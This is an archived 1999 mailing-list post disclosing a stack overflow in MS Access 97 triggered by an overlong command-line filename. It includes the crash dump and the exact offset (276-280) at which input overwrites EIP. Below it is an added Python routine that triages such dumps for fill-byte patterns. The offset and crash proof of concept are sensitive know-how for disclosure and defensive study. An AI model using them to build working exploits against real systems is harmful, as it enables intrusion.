MS Access command line stack overflow
Subject: MS Access command line stack overflow
From: C. R. Messina (crmessina SPIDERLINK.NET)
Date: Mon Dec 20 1999 - 10:55:38 CST
Hello guys:
I just found out that you can overflow the stack on Access 97
by passing it a large filename on the command line.
The following is an example under Windows 98:
(also proven to work under Windows NT Workstation SP-4)
drive:\pathtoaccess\msaccess.exe [280+ 'overflow character']
output:
MSACCESS caused an invalid page fault in
module <unknown> at 0141:41414141.
Registers:
EAX=00000290 CS=0167 EIP=41414141 EFLGS=00000206
EBX=00000000 SS=016f ESP=0062fc94 EBP=41414141
ECX=d709b060 DS=016f ESI=bff552f6 FS=4667
EDX=00000000 ES=016f EDI=80000000 GS=0000
Bytes at CS:EIP:
Stack dump:
706d622e 00000000 0062fd94 00520065
00000064 00000000 0062fd94 30002852
00000000 81a740cb 0062fd94 00520065
302c34f0 bff772f8 0062fca8 30002827
In this very case exactly the last 4 characters
(from offset 276 to 280) overwrite eip with 0x41414141.
I have no time at the moment for further investigation on the matter
so if any of you foresee any interesting situation here feel free to
check it out at will.
<Hex>
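
Added example, not part of the original post: a small Python triage routine for the fault text quoted above, flagging registers that hold a single printable byte repeated four times (here 0x41, the fill character) as a sign that input reached the saved frame pointer and return address. The function names are hypothetical; the sample text is the register dump copied from the post.

```python
import re

# Fault dialog text as quoted in the post above (header and register lines).
SAMPLE_DUMP = """\
MSACCESS caused an invalid page fault in
module <unknown> at 0141:41414141.
Registers:
EAX=00000290 CS=0167 EIP=41414141 EFLGS=00000206
EBX=00000000 SS=016f ESP=0062fc94 EBP=41414141
ECX=d709b060 DS=016f ESI=bff552f6 FS=4667
EDX=00000000 ES=016f EDI=80000000 GS=0000
"""

# NAME=hex pairs as printed by the Windows 9x fault dialog.
REG_RE = re.compile(r"\b([A-Z]{2,5})=([0-9a-fA-F]{4,8})\b")

def parse_registers(dump):
    """Return {register name: int value} for every NAME=hex pair in the dump."""
    return {name: int(value, 16) for name, value in REG_RE.findall(dump)}

def is_fill_pattern(value):
    """True when a 32-bit value is one printable ASCII byte repeated four times."""
    raw = value.to_bytes(4, "little")
    return len(set(raw)) == 1 and 0x20 <= raw[0] <= 0x7E

def triage(dump):
    """Summarise signs that input data overwrote saved control state."""
    regs = parse_registers(dump)
    # Only the 32-bit registers are checked; segment registers are 16-bit.
    wide = ("EAX", "EBX", "ECX", "EDX", "ESI", "EDI", "EBP", "ESP", "EIP")
    tainted = sorted(r for r in wide if r in regs and is_fill_pattern(regs[r]))
    return {
        "fill_registers": tainted,
        "fill_byte": chr(regs[tainted[0]] & 0xFF) if tainted else None,
        "unknown_module": "module <unknown>" in dump,
        "control_flow_hijack_likely": "EIP" in tainted,
    }

if __name__ == "__main__":
    print(triage(SAMPLE_DUMP))
```

A fault address outside any loaded module combined with EIP and EBP both holding the fill byte is the pattern to escalate when sorting crash reports.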
This archive was generated by hypermail 2b27 : Fri Dec 24 1999 - 10:59:05 CST